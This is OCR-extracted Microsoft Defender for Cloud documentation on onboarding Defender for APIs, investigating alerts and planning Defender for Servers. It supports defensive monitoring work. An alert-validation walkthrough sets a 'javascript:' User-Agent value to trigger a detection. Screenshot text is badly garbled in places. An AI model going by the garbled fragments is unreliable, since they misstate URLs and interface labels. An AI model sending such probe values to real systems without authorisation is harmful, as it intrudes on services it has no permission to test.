Log Analytics agent/Azure Monitor agent Collects security-related configurations and event logs from the machine and stores the data in yourtog E EO 
Analytics workspace for analysis. Learn more 


tics 
eb workspace 


Vulnerability assessment for machines Enables vulnerability assessment on your Azure and hybrid machines, Learn more a 


4. Optionally, create a workspace. 


5. Enable Microsoft Defender for Cloud on the workspace on which you're installing the Log Analytics 
agent: 


a. From Defender for Cloud's menu, open Environment settings. 


b. Set the workspace on which you're installing the agent. Make sure the workspace is in the same 
subscription you use in Defender for Cloud and that you have read/write permissions for the 


workspace. 


c. Select one or both "Servers" or "SQL servers on machines"(Foundational CSPM is the free default), 
and then select Save. 


Home > Microsoft Defender for Cloud | Environment settings 


17) Settings | Defender plans 


2 Microsoft Defender plans will apply to: 0 Azure and 0 non-Azure resources reporting to this workspace 


A Select Defender plan 


Enable all plans 


Plan 


© uraz 


/Server/Month $0.015/Core/Hour © 


© Note 


If the workspace already has a Security or SecurityCenterFree solution enabled, the pricing will 
be set automatically. 


6. To deploy agents on new VMs using a Resource Manager template, install the Log Analytics agent: 


e Install the Log Analytics agent for Windows 
e Install the Log Analytics agent for Linux 


7. To deploy agents on your existing VMs, follow the instructions in Collect data about Azure Virtual 
Machines (the section Collect event and performance data is optional). 


8. To use PowerShell to deploy the agents, use the instructions from the virtual machines documentation: 
e For Windows machines 


e For Linux machines 


Q Tip 


For more information about onboarding, see Automate onboarding of Microsoft Defender for Cloud 
using PowerShell. 


To turn off monitoring components: 


e Go to the Defender plans and turn off the plan that uses the extension and select Save. 


e For Defender plans that have monitoring settings, go to the settings of the Defender plan, turn off the 
extension, and select Save. 
© Note 


e Disabling extensions does not remove the extensions from the effected workloads. 


e For information on removing the OMS extension, see How do | remove OMS extensions installed 
by Defender for Cloud. 


About Microsoft Defender for APIs 
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Microsoft Defender for APIs is a plan provided by Microsoft Defender for Cloud that 
offers full lifecycle protection, detection, and response coverage for APIs. 


Defender for APIs helps you to gain visibility into business-critical APIs. You can 
investigate and improve your API security posture, prioritize vulnerability fixes, and 
quickly detect active real-time threats. 


@ Important 


Defender for APIs is currently in PREVIEW. See the Supplemental Terms of Use for 
Microsoft Azure Previews Z for legal terms that apply to Azure features that are in 
beta, preview, or otherwise not yet released into general availability. 


Defender for APIs currently provides security for APIs published in Azure API 
Management. Defender for APIs can be onboarded in the Defender for Cloud portal, or 
within the API Management instance in the Azure portal. 


What can I do with Defender for APIs? 


e Inventory: In a single dashboard, get an aggregated view of all managed APIs. 

e Security findings: Analyze API security findings, including information about 
external, unused, or unauthenticated APIs. 

e Security posture: Review and implement security recommendations to improve 
API security posture, and harden at-risk surfaces. 

e API sensitive data classification: Classify APIs that receive or respond with 
sensitive data, to support risk prioritization. Defender for APIs integrates with MIP 
Purview enabling custom data classification and support for sensitivity labels, and 
hydration of same into Cloud Security Explorer for end to end Data Security 

e Threat detection: Ingest API traffic and monitor it with runtime anomaly detection, 
using machine-learning and rule-based analytics, to detect API security threats, 
including the OWASP API Top 10” critical threats. 

e Defender CSPM integration: Integrate with Cloud Security Graph and Attack Paths 
in Defender Cloud Security Posture Management (CSPM) for API visibility and risk 
assessment across your organization. 

e Azure API Management integration: With the Defender for APIs plan enabled, you 
can receive API security recommendations and alerts in the Azure API 


Management portal. 


e SIEM integration: Integrate with security information and event management 


(SIEM) systems, making it easier for security teams to investigate with existing 


threat response workflows. Learn more. 


Reviewing API security findings 


Review the inventory and security findings for onboarded APIs in the Defender for Cloud 


API Security dashboard. The dashboard shows the number of onboarded devices, 


broken down by API collections, endpoints, and Azure API Management services. 


Home > Microsoft Defender for Cloud | Workload protections 


Microsoft Defender for Cloud | API Security (Preview) 


bscriptions 


© Refresh E Open quer 


d Download CSV report 


24 


API Collections 


aly 45 


API Endpoints 


Se 


Filter b tion name Subscription == All X 


Showing 1 to 4 of 4 items 


Base URL == All X 


TI collection name ty Base URL TA Discovered via Ty 
O contoso-api http(s)://defenderapidemo.azure-... DefenderAPIDemo 
C] demo-conference-api http(s)://defenderapidemo.azure-... DefenderAPIDemo 
o echo-api https://defenderapidemo.azure-a. DefenderAPIDemo 
go sensitive-api http(s)://defenderapidemo.azure- DefenderAPiDemo 


Azure API Management Services 


Number of API en... TA 


Discovered via == All X 


ty Add filter 


0 inactive 
0 inactive 
2 inactive 


0 inactive 


30 Days un... Ty 


Authentica... Ty External traffic ob... Ty Sensitive data en... Ty 


D unauthenticat... 2 endpoints 0 endpoints 
0 unauthenticat... 0 endpoints 0 endpoints 
1 unauthenticat... 4 endpoints 1 endpoint 

0 unauthenticat... 2 endpoints 0 endpoints 


You can drill down into the API collection to review security findings for onboarded API 


endpoints. 


Base URL: https://defenderapidemo.azure-api.net/echo 


Endpoint name Ty Endpoint T4 Last called date (... 
create-resource resource POST 4/17/2023 
modify-resource resource PUT 1/23/2023 


remove-resource /resource DELETE Awaiting data 


retrieve-header-only 1/23/202 
retrieve-resource 4/13/2023 
retrieve-resource-cach-. /resource-cached GET 4/13/20, 


API endpoint information includes: 


T4 30 Days unused Ty 


© Active 

DO inactive 
Awaiting data 
D inactive 
© active 

© Active 


Authentication Ty 
© authenticated 
© unauthenticated 
Awaiting data 
Awaiting data 

© authenticated 


© Authenticated 


External traffic ob... 7, Data classifications Ty 


1/23/2023 U.S. Social Security Number (SSN) 


Awaiting data 


Awaiting data 
4/13/202: 
4/13/2023 


e Endpoint name: The name of API endpoint/operation as defined in Azure API 


Management. 


e Endpoint: The URL path of the API endpoints, and the HTTP method. Last called 
data (UTC): The date when API traffic was last observed going to/from API 


endpoints (in UTC time zone). 


e 30 days unused: Shows whether API endpoints have received any API call traffic in 


the last 30 days. APIs that haven't received any traffic in the last 30 days are 


marked as Inactive. 


e Authentication: Shows when a monitored API endpoint has no authentication. 
Defender for APIs assesses the authentication state using the subscription keys, 
JSON web token (JWT), and client certificate configured in Azure API Management. 
If none of these authentication mechanisms are present or executed, the API is 
marked as unauthenticated. 

e External traffic observed date: The date when external API traffic was observed 
going to/from the API endpoint. 

e Data classification: Classifies API request and response bodies based on data types 
defined in MIP Purview or from a Microsoft supported set. 


© Note 


API endpoints that haven't received any traffic since onboarding to Defender for 
APIs display the status Awaiting data in the API dashboard. 


Investigating API recommendations 


Use recommendations to improve your security posture, harden API configurations, 
identify critical API risks, and mitigate issues by risk priority. 


Defender for API provides a number of recommendations, including recommendations 
to onboard APIs to the Defender for API plan, disable and remove unused APIs, and best 
practice recommendations for security, authentication, and access control. 


Review the recommendations reference. 


Detecting threats 


Defender for APIs monitors runtime traffic and threat intelligence feeds, and issues 
threat detection alerts. API alerts detect the top 10 OWASP API threats, data exfiltration, 
volumetric attacks, anomalous and suspicious API parameters, traffic and IP access 
anomalies, and usage patterns. 


Review the security alerts reference. 


Responding to threats 


Act on alerts to mitigate threats and risk. Defender for Cloud alerts and 
recommendations can be exported into SIEM systems such as Microsoft Sentinel, for 


investigation within existing threat response workflows for fast and efficient 


remediation. Learn more. 


Investigating Cloud Security Graph insights 


Cloud Security Graph in the Defender CSPM plan analyses assets and connections across 
your organization, to expose risks, vulnerabilities, and possible lateral movement paths. 


When Defender for APIs is enabled together with the Defender CSPM plan, you can 
use Cloud Security Explorer to proactively and efficiently query your organizational 
information to locate, identify, and remediate API assets, security issues, and risks. 


Home > Microsoft Defender for Cloud 


m@ Microsoft Defender for Cloud | Cloud Security Explorer 
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Next steps 


Review support and prerequisites for Defender for APIs deployment. 


Support and prerequisites for Defender 
for APIs deployment 
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Review the requirements on this page before setting up Microsoft Defender for APIs. 


Defender for APIs is currently in preview. 


Cloud and region support 


Defender for APIs is in public preview in the Azure commercial cloud, in these regions: 


e Asia (Southeast Asia, EastAsia) 
e Australia (Australia East, Australia Southeast, Australia Central, Australia Central 2) 


e Brazil (Brazil South, Brazil Southeast) 


e Canada (Canada Central, Canada East) 


e Europe (West Europe, North Europe) 

e India (Central India, South India, West India) 

e Japan (Japan East, Japan West) 

e UK (UK South, UK West) 

e US (East US, East US 2, West US, West US 2, West US 3, Central US, North Central 
US, South Central US, West Central US, East US 2 EUAP, Central US EUAP) 


Review the latest cloud support information for Defender for Cloud plans and features in 


the cloud support matrix. 


API support 


Feature 


Availability 


API 
gateways 


API types 


Multi- 
region 


Supported 


This feature is available in the Premium, Standard, Basic, and Developer tiers of 
Azure API Management. 


Azure API Management 


Defender for APIs currently doesn't onboard APIs that are exposed using the API 
Management self-hosted gateway, or managed using API Management 
workspaces. 


Currently, Defender for APIs discovers and analyzes REST APIs. 


There is currently limited support for API security insights for APIs published in 
Azure API Management multi-region deployments. Security insights, including data 


Feature 


support 


Supported 


classifications, assessments of inactive APIs, unauthenticated APIs, and external 
APIs, is limited to supporting API traffic to the primary region (no support for 
security insights for secondary regions). All security detections and subsequently 
generated security alerts will work for API traffic sent to both primary and 
secondary regions. 


Defender CSPM integration 


To explore API security risks using Cloud Security Explorer, the Defender Cloud Security 


Posture Management (CSPM) plan must be enabled. Learn more. 


Onboarding requirements 


Onboarding requirements for Defender for APIs are as follows. 


Requirement 


API 
Management 
instance 


Azure account 


Onboarding 
permissions 


Onboarding 
location 


Details 


At least one API Management instance in an Azure subscription. Defender for 
APIs is enabled at the level of a subscription. 


One or more supported APIs must be imported to the API Management 
instance. 


You need an Azure account to sign in to the Azure portal. 


To enable and onboard Defender for APIs, you need the Owner or Contributor 
role on the Azure subscriptions, resource groups, or Azure API Management 
instance that you want to secure. If you don't have the Contributor role, you 
need to enable these roles: 


- Security Admin role for full access in Defender for Cloud. 
- Security Reader role to view inventory and recommendations in Defender for 
Cloud. 


You can enable Defender for APIs in the Defender for Cloud portal, or in the 
Azure API Management portal. 


Next steps 


Enable and onboard Defender for APIs. 


Protect your APIs with Defender for 
APIs (Preview) 
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Defender for APIs in Microsoft Defender for Cloud offers full lifecycle protection, 
detection, and response coverage for APIs. 


Defender for APIs helps you to gain visibility into business-critical APIs. You can 
investigate and improve your API security posture, prioritize vulnerability fixes, and 
quickly detect active real-time threats. 


Learn more about the Microsoft Defender for APIs plan in the Microsoft Defender for 
Cloud. Defender for APIs is currently in preview. 


Prerequisites 


e You need a Microsoft Azure subscription. If you don't have an Azure subscription, 
you can sign up for a free subscription”. 


e You must enable Microsoft Defender for Cloud on your Azure subscription. 


e Review Defender for APIs support, permissions, and requirements before you 
begin deployment. 


e You enable Defender for APIs at the subscription level. 

e Ensure that APIs you want to secure are published in Azure API management. 
Follow these instructions to set up Azure API Management. 

© Note 


This article describes how to enable and onboard the Defender for APIs plan in the 
Defender for Cloud portal. Alternately, you can enable Defender for APIs within an 
API Management instance in the Azure portal. 


Enable the Defender for APIs plan 


1. Sign into the portal”, and in Defender for Cloud, select Environment settings. 


2. Select the subscription that contains the managed APIs that you want to protect. 


3. In the APIs plan, select On. Then select Save. 


e Settings | Defender plans 


loud Security Postur 


Goud Workload Protection (CWP) 


ene gor i 


4. Select Save. 


O Note 


After enabling Defender for APIs, onboarded APIs take up to 50 minutes to appear 
in the Recommendations tab. Security insights are available in the Workload 
protections > API security dashboard within 40 minutes of onboarding. 


Onboard APIs 


1. In the Defender for Cloud portal, select Recommendations. 
2. Search for Defender for APIs. 


3. Under Enable enhanced security features, select the security recommendation 
Azure API Management APIs should be onboarded to Defender for APIs. 


Home > Microsoft Defender for Cloud 
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© Security posture 
© Regulatory compliance W Enable enhanced security features Not scored Not scored © Completed 17 of 242 reso 
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4. In the recommendation page, you can review the recommendation severity, 
update interval, description, and remediation steps. 


5. Review the resources in scope for the recommendations: 


e Unhealthy resources: Resources that aren't onboarded to Defender for APIs. 
e Healthy resources: API resources that are onboarded to Defender for APIs. 


e Not applicable resources: API resources that aren't applicable for protection. 


6. In Unhealthy resources, select the APIs that you want to protect with Defender for 
APIs. 


7. Select Fix. 


Home > Microsoft Defender for Cloud | Recommendations 


Azure API Management APIs should be onboarded to Defender for APIs 


E Open query 


Severity Freshness interval 
| High © 30 Min 
V Description 


v Remediation steps 
~ Affected resources 


Unhealthy resources (2) Healthy resources (4) Not applicable resources (0) 


| O Search azure resources 
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* Ontime = wake 
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8. In Fixing resources, review the selected APIs, and select Fix resources. 


Home > Microsoft Defender for Cloud | Recommendations 


Fixing resources 
Azure API Management APIs should be onboarded to Defender for APIs deda 


By selecting "Fix" on the selected API Collections, these AP! Collections will be 
T Open query 


onboarded to Defender for APIs and will be monitored for security coverage. 
Severity Freshness interval 
[High GO 30 Min Selected resources 
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EZ defenderapi 
v Description 


v Remediation steps 
^ Affected resources 


Unhealthy resources (2) Healthy resources (4) Not applicable resources (0) 
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Te EEE ; 


9. Verify that remediation was successful. 


POE E  EEO 


Home > Microsoft Defender for Cloud | Recommendations Notifications 
Azure API Management APIs should be onboarded to Defender for APIs 
More events in the activity log -» Dismiss all 
EE Open query 
@ Remediation successful (Azure API Management APIs should be 
Severity Freshness interval onboarded to Defender for APIs) 
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resources’ tab 
Description 
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Unhealthy resources (2)  Mealthy resource: 


[7] Name ty Display name Subscription Azure API Management res. Q A 


Not applicable resources (0) 


Track onboarded API resources 


After onboarding the API resources, you can track their status in the Defender for Cloud 
portal > Workload protections > API security. 


Home > Microsoft Defender for Cloud 
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Next steps 


Review API threats and security posture. 


Validate your Microsoft Defender for 
APIs alerts 
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Microsoft Defender for APIs offers full lifecycle protection, detection, and response 
coverage for APIs that are published in Azure API Management. One of the main 
capabilities is the ability to detect exploits of the Open Web Application Security Project 
(OWASP) API Top 10 vulnerabilities through runtime observations of anomalies using 
machine learning-based and rule-based detections. 


This page will walk you through the steps to trigger an alert for one of your API 
endpoints through Defender for APIs. In this scenario, the alert will be for the detection 
of a suspicious user agent. 


Prerequisites 


Create a new Azure API Management service instance in the Azure portal 


Check the support and prerequisites for Defender for APIs deployment 


Import and publish your first API 


Onboard Defender for APIs 


An account with Postman E 


Simulate an alert 


1. Sign in to the Azure portal £. 


2. Search for and select API Management services. 


Resources O Threat management E automanage 
E Firewall Manager © Azure Managed Grafana 


Marketplace 


D API Management DO Choreo Internal Developer Platform 
Â Kong Konnect Enterprise D Noname Security 


D Axway Amplify API Management Platform 


ate Azure API Management 


COS Tutorial - Import and publish your first API in Azure API Managem. Configure your Azure API Management service using Git 


3. Select APIs. 
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External cache None 


? Subscriptions 
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Virtual network None 
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` asclab | APIs * 
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5. Navigate to the Test tab. 


6. Select Get Retrieve resource (cashed). 


Properties Get started Learn more Monitor 


Recommendations (0) 


GraphQL 


Access the full capabilities of your 
data from a single endpoint. 


</> 


WSDL 


Standard XML representation of 
your SOAP API 


7. In the HTTP request section select the see more button. 


10. 
11. 


12. 


13. 
14. 
15. 
16. 


17. 


en changelog 


Group by tag, 
Echo API > Retrieve resource (cached) > Console 


Haddan 


Retrieve resource (cached) 
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Request URL 


hnctpes/ /aceLab.szure-api.net/acho/resource-cached?ceranl-canole 


HTTP request 


. Select the Copy button. 


. Navigate and sign in to your Postman account ©. 


Select My Workspace. 
Select +. 


Enter the HTTPS request information you copied. 
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ARS 
| = 

EE dd Key Value 

You haven't sent any requests. param1 sample 


Any request you send in this workspace will 


appear here. 


Show me how 


Select the Headers tab 

In the key field, enter Ocp-Apim-Subscription-Key. 
In the value field enter the key you copied. 

In the key field enter User-Agent. 


In the value field enter javascript:. 


Home Workspaces ~ API Network v~ 
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After some time, Defenders APIs will trigger an alert with detailed information about the 


simulated suspicious user agent activity. 


Next steps 


Learn how to Investigate API findings, recommendations, and alerts. 


Investigate API findings, 
recommendations, and alerts 


Article e 09/29/2023 


This article describes how to investigate API security findings, alerts, and security 
posture recommendations for APIs protected by Microsoft Defender for APIs. 


Before you start 


e Onboard your API resources to Defender for APIs. 
e To explore security risks within your organization using Cloud Security Explorer, the 
Defender Cloud Security Posture Management (CSPM) plan must be enabled. 


Learn more. 


View recommendations and runtime alerts 
1. In the Defender for Cloud portal, select Workload protections. 
2. Select API security (Preview). 


3. In the API Security dashboard, select an API collection. 


Microsoft Defender for Cloud | API Security (Preview) 


4. In the API collection page, to drill down into an API endpoint, select the ellipses (...) 


> View resource. 


Home > Microsoft Defender for Cloud | Workload protections > Microsoft Defender for Cloud | API Security (Preview) 


echo-api 


Endpoint == All X Http Method == All X 30 Days unused == All X Authentication == All X ty Add filter 


Showing 1 to 6 of 6 items 


Base URL: https://defenderapidemo.azure-api.net/echo 


Endpoint name Ty Endpoint Ty Last called date (... 7 30Daysunused t4 Authentication Ty External traffic ob... 74 Data classifications Ty 

create-res resource POST © Active © Authenticated 

modify-resource resource PUT @ inactive © unauthenticated U.S. Social Security Number (SSN) 
A A View resource 

remove-resource /resource DELETE Awaiting data Awaiting data 

retrieve-header-only resource HEAD @ inactive Awaiting data 

retrieve-resource resource GET © active © authenticated 

retrieve-resource-cach-._ /resource-cached GET © active © authenticated 


a 


5. In the Resource health page, review the endpoint settings. 
6. In the Recommendations tab, review recommendation details and status. 


7. In the Alerts tab, review security alerts for the endpoint. Defender for Endpoint 


monitors API traffic to and from endpoints, to provide runtime protection against 
suspicious behavior and malicious attacks. 


Home > Microsoft Defender for Cloud | Workload protections > Microsoft Defender for Cloud | AP! Security (Preview) 


echo-api 
Resource health 
$ a 
= Ci , 
<> modify deika Recommendations Alerts 
2 Go A Search Status == All X Severity == All X 
Active recommendations Active alerts 
Severity T Description Status Ty 
eee f-o API endpoints in Azure API Management should be authenticated Preview © Unhealthy 
ome Low API endpoints that are unused should be disabled and removed from the Azure API Manage @ Unhealthy 
APIE 
Page | 1 v | of 1 


A 


Create sample security alerts 


In Defender for Cloud you can use sample alerts to evaluate your Defender for Cloud 
plans, and validate your security configuration. Follow these instructions to set up 
sample alerts, and select the relevant APIs within your subscriptions. 


Simulate alerts 


To see the alert process in action, you can simulate an action that triggers a Defender for 
APIs alert. Follow the instructions in our Tech Community blog “ to do that. 


Build queries in Cloud Security Explorer 


In Defender CSPM, Cloud Security Graph collects data to provide a map of assets and 
connections across organization, to expose security risks, vulnerabilities, and possible 


lateral movement paths. 


When the Defender CSPM plan is enabled together with Defender for APIs, you can use 
Cloud Security Explorer to identify, review and analyze API security risks across your 


organization. 


1. In the Defender for Cloud portal, select Cloud Security Explorer. 

2. In What would you like to search? select the APIs category. 

3. Review the search results so that you can review, prioritize, and fix any API issues. 

4. Alternatively, you can select one of the templated API queries to see high risk 
issues like Internet exposed API endpoints with sensitive data or APIs 
communicating over unencrypted protocols with unauthenticated API endpoints 


Next steps 


Manage your Defender for APIs deployment. 


Manage your Defender for APIs 
deployment 


Article e 07/13/2023 


This article describes how to manage your Microsoft Defender for APIs plan deployment 
in Microsoft Defender for Cloud. Management tasks include offboarding APIs from 
Defender for APIs. 


Defender for APIs is currently in preview. 


Offboard an API 


1. In the Defender for Cloud portal, select Workload protections. 
2. Select API security. 


3. Next to the API you want to offboard from Defender for APIs, select the ellipsis (...) 
> Remove. 


Home > Messo Eee for Cloud | Workload pea en 
Microsoft Defender for Cloud | API Security (Preview) 


4 ay 45 G1 
API Collections AM Endpoint Azure APL Management Services 


Query your APIs with the cloud security 
explorer 


You can use the cloud security explorer to run graph-based queries on the cloud 
security graph. By utilizing the cloud security explorer, you can proactively identify 
potential security risks to your APIs. 


There are three types of APIs you can query: 
e API Collections - A group of all types of API collections. 


e API Endpoints - A group of all types of API endpoints. 


e API Management services - API management services are platforms that provide 


tools and infrastructure for managing APIs, typically through a web-based 


interface. They often include features such as: API gateway, API portal, API analytics 


and API security. 


To query APIs in the cloud security graph: 


1. Sign in to the Azure portal £. 


2. Navigate to Microsoft Defender for Cloud > Cloud Security Explorer. 


3. From the drop down menu, select APIs. 


Microsoft Azure (Preview) 


P Search resources, services, and docs (G+/) 


Home > Microsoft Defender for Cloud 


e Microsoft Defender for Cloud | Cloud Security Explorer 


jing 95 subscriptions 
Search ] @ Share query link 
General 

© overview 

e Getting started 

2= Recommendations 
© security alerts 


Select resource types 
@ Inventory I typi 


Œ. Coud Security Explorer Search 


AP Guides & Feedback 


v Ñ What would you like to search? 


Si workbooks Y? Popular O select an 
b > [API Collections 
æ Community © compute 
> [_] API Endpoints 
@ Diagnose and solve problems E, Networking EE 
> [_] API Management services 


Cloud Security D pata 


ZE containers 


‘Security posture 
9 NE Scope : 17 sele 


© Regulatory compliance @ keys & Secrets 


Ọ Workload protections 


E Firewall Manager 


©) DevOps 
DevOps Security (Pı 
© Benes Secuay Green E aA Identity & Access 
Management 
ea Clear all 
I Environment settings 
Hi Security solutions Open query > 


TA Workflow automation 


JZ. User accounts without MFA and 


4. Select all relevant options. 
5. Select Done. 
6. Add any other conditions. 


7. Select Search. 


Hover on an item to 
show more info 


vulnerabilities 


Open query > 


Azure Kubernetes pods running 


š vulnerable to a specific 
ierability 


| oone | s all internet exposed virtual 


«shines vulnerable to Log4Shell 
vulnerabilities 


Open query > 


@ Key Vault keys and secrets 


E Templates 


l Internet exposed SQL servers with 


managed identity 


Returns all internet exposed SQL 
servers with managed identity 


assigned 


Open query > 


, User accounts with permission to 


You can learn more about how to build queries with cloud security explorer. 


Next steps 


Learn about Defender for APIs. 


Common questions about 
Defender for APIs 


FAQ 


Availability and onboarding 


I'm getting an error while onboarding APIs to 
Defender for APIs from the Recommendations 
page. 


If you encounter errors like "Access Denied", "Forbidden", "Role Assignment not found", 
or "Authorization Failed", ensure that you have the right level of permission for the 
Azure API Management service and Microsoft Defender for Cloud. Required set of 
permissions can be found here. The error "Request Header or Cookie Too Large" can 
typically be fixed by clearing all cookies; clear your browser cookies and try the 
operation again. 


Does onboarding APIs to Defender for APIs 
affect my Azure API Management service? 


Enabling Defender for APIs monitoring coverage requires compute & memory utilization 
on the Azure API Management service. Monitor the performance of your Azure API 
Management service while onboarding APIs and scale out your Azure API Management 


resources when needed. 


| use Azure API Management Consumption tier 
offering. Can | use Defender for APIs? 


No, support for Azure API Management consumption tier is currently not available. 


How does Defender for APIs handle support for 
API revisions in Azure API Management? 


API revisions in Azure API Management are shown as separate API endpoints within 
Defender for APIs because each API revision is unique and might have its own security 


insights. Offline Azure API Management API revisions aren't shown in the onboarding or 
security insights blades of Defender for APIs because offline revisions don't allow any 
traffic to be sent to them and pose no security risk. 


Questions related to region/geo 


| just moved my APIs within my Azure API 
Management service to a new region. Why are 
these not updated? 


APIs that are moved from one region to another region require offboarding and 
onboarding of the APIs. 


How do I enable Defender for APIs plan for a 
specific set of Azure API Management services? 


Microsoft Defender for APIs plan is enabled at the subscription level. You can select 
which APIs in Azure API Management from that subscription are onboarded for security 
coverage. 


| onboarded APIs from Azure API Management 
to Defender for APIs, but they're still showing 
under unhealthy resources on the 
recommendation page / | don't see any security 
insights for the APIs | onboarded. 


Defender for APIs will take 30 minutes to generate the first security insights after 
onboarding an API and to move the onboarded APIs from unhealthy to healthy status. 
Thereafter, security insights are refreshed every 30 minutes. 


Why do security insights within the API 
collection details page show as "Awaiting Data"? 
API endpoints that have received no traffic since onboarding to Defender for APIs 


display the message ‘Awaiting data’ under security insights. Until the API endpoint 
receives traffic, the security insight assessment can't be made. 


| have a self-hosted Azure API Management 
gateway. Can | use Defender for APIs for 
securing my APIs? 


Currently Defender for APIs support is limited to the cloud hosted instances of Azure 
API Management gateways only. 


My Azure API Management service is in a VNet. 
Do | need to have additional connectivity 
configured for Defender for APIs? 


No, Defender for APIs won't need special configuration for accessing API data from 
Azure API Management service behind a VNET. 


What is the IP address shown in Defender for 
APIs alerts description page if x-forwarded-for is 
configured within our network? 


Defender for APIs shows the IP address of the inbound IP address from client IPs. If x- 
forwarded-for is used, Defender for APIs validates the IP hops as part of the x- 
forwarded-for used within the request to show the most accurate IP that inbound 


request is coming from. 


We use a custom domain URL within Azure API 
Management, will Defender for APIs show this 
URL as the Endpoint URL? 


Custom domain URLs aren't shown within the Endpoint URL. The Defender for APIs 
Endpoint URL shows the base URL of your API Management API endpoint 


Does Defender for APIs support APIs published 
in multi-region Azure API Management 
deployments? 


There is currently limited support for API security insights for APIs published in Azure 
API Management multi-region deployments. Security insights, including data 


classifications, assessments of inactive APIs, unauthenticated APIs, and external APIs, is 
limited to supporting API traffic to the primary region (no support for security insights 
for secondary regions). All security detections and subsequently generated security 
alerts will work for API traffic sent to both primary and secondary regions. 


Questions about alerts in Defender for 
APIs 


How soon can we receive alerts on anomalous 
APIs? 


APIs are assessed against their behavior studying traffic for the past 30 days. The alerts 
on anomalous APIs may be generated sooner if the API receives significant traffic for the 
ML models to learn traffic behavior. 


Questions about Defender for APIs and 
WAF 


Is Azure WAF sufficient for securing APIs? 


While Web Application Firewalls (WAF) are a valuable solution for protecting 
applications, they may not provide complete security for APIs. WAFs are designed to 
apply generalized protection measures like dictionary, pattern, and signature mapping, 
which work well for applications with consistent traffic patterns. However, APIs are 
unique to each application and have dynamically changing nature, making the abstract 
protections offered by WAFs less effective. 

APIs have different request and response payloads, and each consumer interacts with 
them in their own specific ways. The general dictionary, pattern, and signature mappings 
used by WAFs may not adequately offer complete in depth protection for APIs due to 
their uniqueness. Although there are some cases where overlap exists, such as detecting 
and preventing SQL injection attacks, APIs often require more granular security 
measures. 

To achieve the level of security needed for APIs, a solution like Microsoft Defender for 
APIs is recommended. Defender for APIs learns and understands the API logic using 
machine learning algorithms, thereby providing a contextual understanding that enables 
more precise and effective security measures. This granular level of protection helps 


safeguard APIs against various threats and ensures a higher level of security for 
organizations. 


Next steps 


Learn about Defender for APIs 


Plan your Defender for Servers 
deployment 


Article e 05/29/2023 


Microsoft Defender for Servers extends protection to your Windows and Linux machines 
that run in Azure, Amazon Web Services (AWS), Google Cloud Platform (GCP), and on- 
premises. Defender for Servers integrates with Microsoft Defender for Endpoint to 
provide endpoint detection and response (EDR) and other threat protection features. 


This guide helps you design and plan an effective Defender for Servers deployment. 
Microsoft Defender for Cloud offers two paid plans for Defender for Servers. 


About this guide 


The intended audience of this guide is cloud solution and infrastructure architects, 
security architects and analysts, and anyone who's involved in protecting cloud and 
hybrid servers and workloads. 


The guide answers these questions: 


e What does Defender for Servers do and how is it deployed? 

e Where is my data stored and what Log Analytics workspaces do | need? 

e Who needs access to my Defender for Servers resources? 

e Which Defender for Servers plan should | choose and which vulnerability 
assessment solution should | use? 

e When do | need to use Azure Arc and which agents and extensions are required? 


e How do | scale a deployment? 


Before you begin 


Before you review the series of articles in the Defender for Servers planning guide: 


e Review Defender for Servers pricing details £ . 
e If you're deploying for AWS machines or GCP projects, review the multicloud 


planning guide. 


Deployment overview 


The following table shows an overview of the Defender for Servers deployment process: 


Stage 


Start 
protecting 
resources 


Enable 
Defender for 
Servers 


Protect 
AWS/GCP 
machines 


Protect on- 
premises 
servers 


Foundational 
CSPM 


Details 


e When you open Defender for Cloud in the portal, it starts protecting resources 
with free foundational CSPM assessments and recommendations. 


e Defender for Cloud creates a default Log Analytics workspace with the 
SecurityCenterFree solution enabled. 


e Recommendations start appearing in the portal. 


e When you enable a paid plan, Defender for Cloud enables the Security solution 
on its default workspace. 


e Enable Defender for Servers Plan 1 (subscription only) or Plan 2 (subscription 
and workspace). 


e After enabling a plan, decide how you want to install agents and extensions on 
Azure VMs in the subscription or workgroup. 


«By default, auto-provisioning is enabled for some extensions. 


e For a Defender for Servers deployment, you set up a connector, turn off plans 
you don't need, configure auto-provisioning settings, authenticate to AWS/GCP, 
and deploy the settings. 


e Auto-provisioning includes the agents used by Defender for Cloud and the 
Azure Connected Machine agent for onboarding to Azure with Azure Arc. 


e AWS uses a CloudFormation template. 
e GCP uses a Cloud Shell template. 


e Recommendations start appearing in the portal. 


e Onboard them as Azure Arc machines and deploy agents with automation 
provisioning. 


e There are no charges when you use foundational CSPM with no plans enabled. 


e AWS/GCP machines don't need to be set up with Azure Arc for foundational 
CSPM. On-premises machines do. 


e Some foundational recommendations rely only agents: Antimalware / endpoint 
protection (Log Analytics agent or Azure Monitor agent) | OS baselines 
recommendations (Log Analytics agent or Azure Monitor agent and Guest 
Configuration extension) | System updates recommendation (Log Analytics agent) 


e Learn more about foundational cloud security posture management (CSPM). 


e Learn more about Azure Arc onboarding. 


When you enable Microsoft Defender for Servers on an Azure subscription or a 
connected AWS account, all of the connected machines are protected by Defender for 
Servers. You can enable Microsoft Defender for Servers at the Log Analytics workspace 
level, but only servers reporting to that workspace will be protected and billed and 
those servers won't receive some benefits, such as Microsoft Defender for Endpoint, 
vulnerability assessment, and just-in-time VM access. 


Next steps 


After kicking off the planning process, review the second article in this planning series to 
understand how your data is stored, and Log Analytics workspace requirements. 


Plan data residency and workspaces for 
Defender for Servers 
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This article helps you understand how your data is stored in Microsoft Defender for 
Servers and how Log Analytics workspaces are used in Defender for Servers. 


Defender for Servers is one of the paid plans provided by Microsoft Defender for Cloud. 


Before you begin 


This article is the second article in the Defender for Servers planning guide series. Begin 


by planning your deployment. 


Understand data residency 


Data residency refers to the physical or geographic location of your organization's data. 


Before you deploy Defender for Servers, it's important for you to understand data 


residency for your organization: 


e Review general Azure data residency considerations £ . 
e Review the table in the next section to understand where Defender for Cloud 


stores data. 


Storage locations 


Understand where Defender for Cloud stores data and how you can work with your 
data: 
Data Location 


Security alerts and - Stored in the Defender for Cloud back end and accessible via the Azure 
recommendations portal, Azure Resource Graph, and REST APIs. 


- You can export the data to a Log Analytics workspace by using continuous 
export. 


Data Location 


Machine - Stored in a Log Analytics workspace. 

information 
- You can use either the default Defender for Cloud workspace or a custom 
workspace. Data is stored in accordance with the workspace location. 


Workspace considerations 


In Defender for Cloud, you can store server data in the default Log Analytics workspace 
for your Defender for Cloud deployment or in a custom workspace. 


Here's more information: 


e By default, when you enable Defender for Cloud for the first time, a new resource 
group and a default workspace are created in the subscription region for each 
subscription that has Defender for Cloud enabled. 

e When you use only free foundational cloud security posture management (CSPM), 
Defender for Cloud sets up the default workspace with the SecurityCenterFree 
solution enabled. 

e When you turn on a Defender for Cloud plan (including Defender for Servers), the 
plan is enabled for the default workspace, and the Security solution is enabled. 

